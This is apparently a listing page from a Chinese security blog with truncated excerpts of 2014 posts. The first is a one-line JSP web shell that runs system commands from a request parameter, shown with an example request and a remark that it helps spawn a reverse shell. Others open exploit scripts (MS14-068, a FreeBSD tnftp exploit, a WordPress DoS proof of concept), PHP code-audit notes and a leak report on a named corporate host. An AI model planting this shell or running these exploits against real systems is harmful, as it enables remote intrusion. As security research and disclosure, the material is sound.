admin 发布于 2014-12-18 02:11
一:执行系统命令:
无回显执行系统命令:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
执行之后不会有任何回显,用来反弹个shell很方便。
有回显带密码验证的:...
admin 发布于 2014-12-15 13:07
恶意反向代理的危害以及如何阻止网站被方向代理
首先肯定会占用服务器资源,网站打开速度受影响。
其次,别人通过代理盗用你的网站数据,对用户与不是那么智能的搜索引擎而言,相当于建了一个与你一模一样的站点,那么很有可能你的站点会进搜索引擎沙箱,甚至被降权。
如果被恶意代理的页面,还挂有你的联盟广告(比如Adsense),这就十分危险了,如果有人点击了上面...
admin 发布于 2014-12-15 07:13
在framework/www/open_control.php中:
//网址列表,这里读的是项目的网址列表
function url_f()
{
$id = $this->get("id");
if(!$id) $id = "content";
$this->...
admin 发布于 2014-12-11 11:33
网站在初始化的时候会装载一些资源引擎,其中装载了一个session_file.php,用于初始化session
文件framework/engine/session/file.php:
function __construct($config)
{
if(!$config || !is_array($config...
admin 发布于 2014-12-09 10:35
link:
http://iufo.cofco.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction
用户信息泄漏
link:
http://iufo.cofco.com/service/~iufo/com.ufida.w...
admin 发布于 2014-12-09 10:23
这是前段时间写的代码了(http://www.weibo.com/1074745063/ByAPqj7s0),最近一直忙着和几个同学一起做非安全类的创业项目。所以也没拿到JAE、SAE测试一下。
不说了。。进入正题。
漏洞很久之前(大概5年前)被提出来了,但并不是php代码上的问题,所以问题一直存在,直到现在。我一直没留意,后来yaseng告诉我的,他测试...
admin 发布于 2014-12-09 10:21
看到今天fd上GAE的java沙盒的绕过
http://seclists.org/fulldisclosure/2014/Dec/26
security-explorations 报告他们发现了30+ 的问题,poc写了17个 最后说没有测完。
真心牛X。
翻他们之前的papper,非常赞。 推荐之
http://www.security-explora...
admin 发布于 2014-12-06 10:14
ms14-068.py
#!/usr/bin/python
# MS14-068 Exploit
# Author
# ------
# Sylvain Monne
# Contact : sylvain dot monne at solucom dot fr
# http://twitter.com/bidord
import sys, os
fro...
admin 发布于 2014-12-06 09:07
#!/usr/bin/env python2
#
# Exploit Title: [tnftp BSD exploit]
# Exploit Author: [dash]
# Vendor Homepage: [www.freebsd.org]
# Version: [FreeBSD 8/9/10]
# Tested on: [FreeBSD 9...
admin 发布于 2014-12-06 08:58
<?php
echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
echo "Proof-of-Concept developed by john@secureli.com (http://secureli.com)\n\n";
echo "u...